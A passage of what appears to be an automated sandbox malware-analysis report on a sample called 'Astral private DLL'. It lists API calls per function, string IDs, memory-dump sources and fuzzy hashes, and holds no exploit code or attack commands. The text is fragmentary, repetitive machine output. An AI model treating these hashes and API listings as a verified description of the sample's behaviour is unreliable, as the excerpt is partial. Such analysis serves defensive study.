                                                                • SetDlgItemTextW.USER32(?,00000065,?), ref: 0017C321
                                                                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0017C358
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0017C36E
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0017C38C
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0017C39C
                                                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0017C3B8
                                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0017C3D4
                                                                • _swprintf.LIBCMT ref: 0017C404
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0017C417
                                                                • FindClose.KERNEL32(00000000), ref: 0017C41E
                                                                • _swprintf.LIBCMT ref: 0017C477
                                                                • SetDlgItemTextW.USER32(?,00000068,?), ref: 0017C48A
                                                                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0017C4A7
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0017C4C7
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0017C4D7
                                                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0017C4F1
                                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0017C509
                                                                • _swprintf.LIBCMT ref: 0017C535
                                                                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0017C548
                                                                • _swprintf.LIBCMT ref: 0017C59C
                                                                • SetDlgItemTextW.USER32(?,00000069,?), ref: 0017C5AF
                                                                  • Part of subcall function 0017AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0017AF35
                                                                  • Part of subcall function 0017AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0019E72C,?,?), ref: 0017AF84
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                • API String ID: 797121971-1840816070
                                                                • Opcode ID: e3c8656b6cb9c76248be4c2ea4a8c76f64635792bfa2c0d7ce846afb6148dd0d
                                                                • Instruction ID: 1db678a41b96ba40121317eaaf1a5ab19354acbe6eb21ad0999899bec951ec7a
                                                                • Opcode Fuzzy Hash: e3c8656b6cb9c76248be4c2ea4a8c76f64635792bfa2c0d7ce846afb6148dd0d
                                                                • Instruction Fuzzy Hash: BA918272248348BFD3219BA4DC49FFB7BBCEB4A700F048819F649D6491D775EA448B62
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00166FAA
                                                                • _wcslen.LIBCMT ref: 00167013
                                                                • _wcslen.LIBCMT ref: 00167084
                                                                  • Part of subcall function 00167A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00167AAB
                                                                  • Part of subcall function 00167A9C: GetLastError.KERNEL32 ref: 00167AF1
                                                                  • Part of subcall function 00167A9C: CloseHandle.KERNEL32(?), ref: 00167B00
                                                                  • Part of subcall function 0016A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0016977F,?,?,001695CF,?,?,?,?,?,00192641,000000FF), ref: 0016A1F1
                                                                  • Part of subcall function 0016A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0016977F,?,?,001695CF,?,?,?,?,?,00192641), ref: 0016A21F
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00167139
                                                                • CloseHandle.KERNEL32(00000000), ref: 00167155
                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00167298
                                                                  • Part of subcall function 00169DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001673BC,?,?,?,00000000), ref: 00169DBC
                                                                  • Part of subcall function 00169DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00169E70
                                                                  • Part of subcall function 00169620: CloseHandle.KERNELBASE(000000FF,?,?,001695D6,?,?,?,?,?,00192641,000000FF), ref: 0016963B
                                                                  • Part of subcall function 0016A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0016A325,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A501
                                                                  • Part of subcall function 0016A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0016A325,?,?,?,0016A175,?,00000001,00000000,?,?), ref: 0016A532
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                • API String ID: 3983180755-3508440684
                                                                • Opcode ID: d738e25bc09fc67dccaa1165ab79338936f637279236e5f3ee62d7c919ea698f
                                                                • Instruction ID: d9f3b92289114c162d6ea174e3022eee56386b7c2de7052e24bb13ef8234ee67
                                                                • Opcode Fuzzy Hash: d738e25bc09fc67dccaa1165ab79338936f637279236e5f3ee62d7c919ea698f
                                                                • Instruction Fuzzy Hash: EEC1F871D04604ABEB25EBB4CC41FEEB3ACBF15304F04455AF956E7282D730AA54CB61
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: __floor_pentium4
                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                • API String ID: 4168288129-2761157908
                                                                • Opcode ID: d40b8e4f39c02061dfcc69282280eb59c015ca85cba117512ee7a89931589f83
                                                                • Instruction ID: 4cdc8f613e7b0d292ed128462bdb02016929f2181eae2870f22c9a4840aa5438
                                                                • Opcode Fuzzy Hash: d40b8e4f39c02061dfcc69282280eb59c015ca85cba117512ee7a89931589f83
                                                                • Instruction Fuzzy Hash: 5FC23971E086288FDB29EE289D407EAB7F5EB45305F1541EAD84DE7280E775AF818F40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog_swprintf
                                                                • String ID: CMT$h%u$hc%u
                                                                • API String ID: 146138363-3282847064
                                                                • Opcode ID: 4d40c52e51c04484625d7c39b8a44fbcedd4db5fb689a24fa9c1bad22b9a1953
                                                                • Instruction ID: 3af4bb283c8b4374d96c65eac1c1d4daaad7f069399e4cebfd5cc9bf3a5c1a65
                                                                • Opcode Fuzzy Hash: 4d40c52e51c04484625d7c39b8a44fbcedd4db5fb689a24fa9c1bad22b9a1953
                                                                • Instruction Fuzzy Hash: 5932F671510385AFDF18DF74CC95AEA3BA5AF25300F08447DFD9A8B282DB709A59CB60
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00162874
                                                                • _strlen.LIBCMT ref: 00162E3F
                                                                  • Part of subcall function 001702BA: __EH_prolog.LIBCMT ref: 001702BF
                                                                  • Part of subcall function 00171B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0016BAE9,00000000,?,?,?,0001043C), ref: 00171BA0
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00162F91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                • String ID: CMT
                                                                • API String ID: 1206968400-2756464174
                                                                • Opcode ID: d1276f0ca68d54937fb156075903b46babc1f2cd64f8660f67842c7e458f5af6
                                                                • Instruction ID: 729779708f421095f5bd2bcb24ac6410a024d7fa51295b988dfabaf511077525
                                                                • Opcode Fuzzy Hash: d1276f0ca68d54937fb156075903b46babc1f2cd64f8660f67842c7e458f5af6
                                                                • Instruction Fuzzy Hash: 6F6227716006458FDF19DF78CC956FA3BA1EF64300F08447EECAA8B282DB759965CB60
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0017F844
                                                                • IsDebuggerPresent.KERNEL32 ref: 0017F910
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0017F930
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0017F93A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                • String ID:
                                                                • API String ID: 254469556-0
                                                                • Opcode ID: 17b26e379de36cba1ce513148b2f8a6e38fa60469920d4ea7037c932efef4fac
                                                                • Instruction ID: e3777dd9f83c502e252cdfe62e32881637da35da5b5ab7d929064232f1fb42f4
                                                                • Opcode Fuzzy Hash: 17b26e379de36cba1ce513148b2f8a6e38fa60469920d4ea7037c932efef4fac
                                                                • Instruction Fuzzy Hash: 9C312975D05219DBDB20DFA4D9897CDBBB8AF08304F1080AAE50CAB250EB719B858F45
                                                                APIs
                                                                • VirtualQuery.KERNEL32(80000000,0017E5E8,0000001C,0017E7DD,00000000,?,?,?,?,?,?,?,0017E5E8,00000004,001C1CEC,0017E86D), ref: 0017E6B4
                                                                • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0017E5E8,00000004,001C1CEC,0017E86D), ref: 0017E6CF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: InfoQuerySystemVirtual
                                                                • String ID: D
                                                                • API String ID: 401686933-2746444292
                                                                • Opcode ID: 81ffe12e97870f8c59d9f3d43a27ceaaebb6972b01a025cb3a064509f231771c
                                                                • Instruction ID: 1db124e619a0cc7ad6317d69ae0c155d9b49c56f7692552209337d01edfe8ca3
                                                                • Opcode Fuzzy Hash: 81ffe12e97870f8c59d9f3d43a27ceaaebb6972b01a025cb3a064509f231771c
                                                                • Instruction Fuzzy Hash: 7E01F736A001096BDB18DE29DC09BDD7BFAAFC8328F0CC161ED1DD7154D734D9458680
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00188FB5
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00188FBF
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00188FCC
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: c6ceb031961435adda78abef413f332073a74fb0d64c0a22a1ff89bac7681323
                                                                • Instruction ID: c583d0ed20b0998381b4912bc03ea47c0007112f16a52a6fdd568eeb296497ed
                                                                • Opcode Fuzzy Hash: c6ceb031961435adda78abef413f332073a74fb0d64c0a22a1ff89bac7681323
                                                                • Instruction Fuzzy Hash: 2A31C57590121CABCB21DF68DC89B9DBBB8BF18310F5041EAE41CA7290EB709F858F44
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                • Instruction ID: cb720497bfaae20589dad3d5bd3b7b8620322fd0b61a362fea440f7caf1f4ebe
                                                                • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                • Instruction Fuzzy Hash: C5021B71E002199BDF14DFA9D8906AEB7F1EF48324F25826AD919E7384D731AE418F90
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0017AF35
                                                                • GetNumberFormatW.KERNEL32(00000400,00000000,?,0019E72C,?,?), ref: 0017AF84
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FormatInfoLocaleNumber
                                                                • String ID:
                                                                • API String ID: 2169056816-0
                                                                • Opcode ID: 397f265770c148a0d7883b23f7c4a7254f8ee14fd14bfc412d56f68cb2e133ac
                                                                • Instruction ID: e4015b877d17a0cf2b81f29d2c666ddec16983f149712d2c5cac7699cc99a3e2
                                                                • Opcode Fuzzy Hash: 397f265770c148a0d7883b23f7c4a7254f8ee14fd14bfc412d56f68cb2e133ac
                                                                • Instruction Fuzzy Hash: 0A01713A10030CAADB11DFA4EC45F9A77BCEF08710F009026FA05E7161D3709995CBA5
                                                                APIs
                                                                • GetLastError.KERNEL32(00166DDF,00000000,00000400), ref: 00166C74
                                                                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00166C95
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorFormatLastMessage
                                                                • String ID:
                                                                • API String ID: 3479602957-0
                                                                • Opcode ID: 4f9e88230e9e3e9c11bf54dd79a0e1e4e63ba303a3b5fc92bf5c9d62fa9359d3
                                                                • Instruction ID: 5ff19af2754c7a4ee3e9b751f2719c052f61e635e2230ad77d81fdb7983eb237
                                                                • Opcode Fuzzy Hash: 4f9e88230e9e3e9c11bf54dd79a0e1e4e63ba303a3b5fc92bf5c9d62fa9359d3
                                                                • Instruction Fuzzy Hash: 69D0C931344300BFFA110B628D06F2EBB99BF45B51F18C405BBA5E84E0CB749874E629
                                                                APIs
                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001919EF,?,?,00000008,?,?,0019168F,00000000), ref: 00191C21
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise
                                                                • String ID:
                                                                • API String ID: 3997070919-0
                                                                • Opcode ID: 5a3e8b38cbbfaca5687a0f681f4367ccf4abd817e5dbc6ab4629693575ccbbd8
                                                                • Instruction ID: 5c40558f1e780a31774be9c3fa0f72b84c3b531bcdca1b0fc0ab77ef64abb6aa
                                                                • Opcode Fuzzy Hash: 5a3e8b38cbbfaca5687a0f681f4367ccf4abd817e5dbc6ab4629693575ccbbd8
                                                                • Instruction Fuzzy Hash: 38B14E3561060AEFDB19CF28C48AB657BE1FF45364F258658E89ACF2A1C335ED91CB40
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0017F66A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID:
                                                                • API String ID: 2325560087-0
                                                                • Opcode ID: 7b7f79b004a85849f86b2199caa51367c53367f05297029354642340b9a64847
                                                                • Instruction ID: 1ba7c16f4f3b637b4ae3cbd45cb2464123154e1f9442021f4994f1a182c5c273
                                                                • Opcode Fuzzy Hash: 7b7f79b004a85849f86b2199caa51367c53367f05297029354642340b9a64847
                                                                • Instruction Fuzzy Hash: 90517DB1904609DFEB28CF98E8857AABBF4FB48324F24853AD419EB251D374DD41CB91
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 0016B16B
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: 9325c8680681f9de5ed9052ba8544e757ad896d47f05332c380cce217bf77a60
                                                                • Instruction ID: 6b5ef7f407046e42283da841dca1cf55ed30be02fe15a9b876eee76e7ee52d9a
                                                                • Opcode Fuzzy Hash: 9325c8680681f9de5ed9052ba8544e757ad896d47f05332c380cce217bf77a60
                                                                • Instruction Fuzzy Hash: 69F03AB5E00218EFDB18CB18ED926DA73F1FB8A315F154396E91593790C3B0A9D08E60
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: gj
                                                                • API String ID: 0-4203073231
                                                                • Opcode ID: 57d89eff5a96ab29a3b27a0584b557ee391ff9df432178193a8331a4e31fa2ea
                                                                • Instruction ID: 52c5d3f0f7874048510ecbefabdce17bfb09195189ae3669b695c6ad8a7d4a64
                                                                • Opcode Fuzzy Hash: 57d89eff5a96ab29a3b27a0584b557ee391ff9df432178193a8331a4e31fa2ea
                                                                • Instruction Fuzzy Hash: BDC12776A183418FC354CF29D88065AFBE1BFC8308F19892DE998D7311D734EA59CB96
                                                                APIs
